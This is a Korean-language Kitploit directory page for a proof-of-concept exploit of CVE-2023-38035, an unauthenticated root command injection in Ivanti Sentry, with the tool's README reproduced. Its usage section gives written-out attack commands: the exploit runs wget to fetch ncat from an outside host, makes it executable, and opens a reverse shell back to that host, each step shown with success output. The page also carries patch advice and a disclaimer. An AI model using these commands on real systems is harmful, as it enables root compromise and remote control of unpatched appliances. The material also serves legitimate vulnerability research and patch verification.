Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-38035 — CVE-2023-38035에 대한 개념 증명(PoC) 익스플로잇으로, Ivanti Sentry의 인증되지 않은 명령 주입 취약점을 악용하여 임의의 루트 명령 실행과 ncat을 통한 리버스 셸을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/horizon3ai/cve-2023-38035
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubhorizon3ai/cve-2023-38035

CVE-2023-38035

CVE-2023-38035에 대한 개념 증명(PoC) 익스플로잇으로, Ivanti Sentry의 인증되지 않은 명령 주입 취약점을 악용하여 임의의 루트 명령 실행과 ncat을 통한 리버스 셸을 가능하게 합니다.

저장소 보기
411233년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-38035

Ivanti Sentry에 영향을 미치는 CVE-2023-38035에 대한 POC

기술 분석

취약점에 대한 기술적 근본 원인 분석은 다음 블로그에서 확인할 수 있습니다: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive

요약

이 POC는 인증되지 않은 명령 삽입을 악용하여 root 사용자로 임의 명령을 실행합니다.

실행 컨텍스트는 명령 파이핑을 허용하지 않으며, 시스템에 쉽게 악용 가능한 바이너리가 포함되어 있지 않으므로 명령을 연결하여 https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat 같은 곳에서 정적 ncat을 다운로드할 수 있습니다.

사용법

root@kitploit:~
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat' 
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

Shell

완화 조치

Ivanti 권고의 지침에 따라 최신 버전으로 업데이트하십시오

  • https://forums.ivanti.com/s/article/KB-API-Authentication-Bypass-on-Sentry-Administrator-Interface-CVE-2023-38035?language=en_US

최신 보안 연구를 위해 Twitter에서 Horizon3.ai Attack Team을 팔로우하세요:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

면책 조항

이 소프트웨어는 순수하게 학술 연구 및 효과적인 방어 기술 개발 목적으로 만들어졌으며, 명시적으로 승인된 경우를 제외하고 시스템을 공격하는 데 사용해서는 안 됩니다. 프로젝트 유지 관리자는 소프트웨어의 오용에 대해 책임을 지지 않습니다. 책임감 있게 사용하십시오.

도구 다운로드